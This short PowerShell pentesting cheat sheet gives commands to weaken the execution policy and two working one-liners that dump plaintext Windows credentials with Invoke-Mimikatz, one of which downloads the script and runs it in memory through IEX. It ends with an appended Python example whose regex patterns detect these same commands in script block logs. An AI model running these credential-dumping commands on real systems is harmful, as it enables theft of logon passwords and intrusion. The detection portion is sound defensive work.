PowerShell pentesting basics

PowerShell's default execution policy blocks importing scripts

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy RemoteSigned (run as administrator)

PowerShell one-liner to dump plaintext credentials (also included in the nishang folder)

  • powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
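As an added detection-side example (not part of the original page): a small Python triage that flags the command patterns listed above when they show up in PowerShell script block logging text (Event ID 4104). The sample script blocks are constructed to mirror the page's commands; the indicator names are assumptions of this example.

```python
import re

# Constructed sample script blocks modelled on this page's commands
# (not real captured logs). Index 0 is a benign baseline.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Select-Object Name",
    "Set-ExecutionPolicy RemoteSigned",
    "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    "Import-Module .\\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '\"privilege::debug\" \"sekurlsa::logonPasswords full\"'",
]

# Indicator names are hypothetical labels chosen for this example.
INDICATORS = [
    # IEX / Invoke-Expression fed by a web download: the classic download cradle
    ("download_cradle", re.compile(
        r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile)\b", re.I)),
    # Invoke-Mimikatz module name or its well-known mimikatz command strings
    ("mimikatz_module", re.compile(
        r"invoke-mimikatz|sekurlsa::|privilege::debug", re.I)),
    # Loosening of the execution policy, as described at the top of the page
    ("execution_policy_change", re.compile(
        r"set-executionpolicy\s+(unrestricted|bypass|remotesigned)", re.I)),
]


def classify(block):
    """Return the indicator names that match a single script block text."""
    return [name for name, rx in INDICATORS if rx.search(block)]


def triage(blocks):
    """Return (index, indicators) for every block that matched at least one
    indicator; benign blocks are omitted so an analyst only sees the hits."""
    results = []
    for i, block in enumerate(blocks):
        hits = classify(block)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(hits)}")
```

Script block logging must be enabled for these events to exist at all, which is the first thing to verify on a host where such one-liners are a concern.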